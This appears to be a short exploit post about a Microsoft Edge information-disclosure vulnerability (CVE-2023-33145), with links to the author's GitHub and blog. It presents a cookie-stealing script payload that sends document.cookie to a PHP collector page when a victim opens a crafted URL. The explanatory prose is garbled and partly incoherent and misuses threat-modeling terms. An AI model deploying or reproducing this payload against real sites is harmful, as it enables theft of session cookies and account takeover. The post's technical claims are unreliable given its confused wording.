#
#
#
#
#
#
https://www.softwaresecured.com/stride-threat-modeling/
#
#
The type of information that could be disclosed if an attacker
successfully exploited this vulnerability is data inside the targeted
website like IDs, tokens, nonces, cookies, IP, User-Agent, and other
sensitive information.
The user would have to click on a specially crafted URL to be
compromised by the attacker.
In this example, the attacker use STRIDE Threat Modeling to spoof the
victim to click on his website and done.
This will be hard to detect.
#
Please be careful, for suspicious sites or be careful who sending you
an link to open!
#
[+]Exploit:
- Exploit Server:
```js
#
it is enough to understand this vulnerability! =)
<script> var i = new Image();
i.src="PoCsess.php?cookie="+escape(document.cookie)</script>
#
#
```
#
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33146)
#
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-edge.html)
#
01:30:00
Recommended Comments